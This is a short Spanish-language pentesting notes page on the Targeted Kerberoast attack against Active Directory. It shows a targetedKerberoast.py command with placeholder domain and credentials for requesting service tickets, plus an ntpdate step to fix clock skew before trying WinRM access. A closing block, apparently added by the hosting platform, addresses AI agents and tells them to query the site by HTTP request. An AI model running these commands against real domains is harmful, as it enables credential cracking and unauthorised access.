# Targeted Kerberoast

El ataque Targeted Kerberoast consiste en **enumerar y solicitar tickets de servicio (TGS) para cuentas de servicio**

<figure><img src="/files/he5uPmmpzgxKFlWOO635" alt=""><figcaption></figcaption></figure>

[Github - targetedKerberoast.py](https://github.com/ShutdownRepo/targetedKerberoast)

```
targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'
```

Si no funciona es debido a que hay mucha diferencia en la hora del servidor con la nuestra por lo que tenemos que ejecutar el siguiente comando varias veces:

```
sudo ntpdate <IP-SERVIDOR>
```

<figure><img src="/files/jnyKbhI8lKpb8yuotd7P" alt=""><figcaption></figcaption></figure>

Y ya podemos ver si tenemos acceso vía Win-rm u otros servicios.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alv-fh.gitbook.io/alv-fh/windows-privilege-escalation/targeted-kerberoast.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
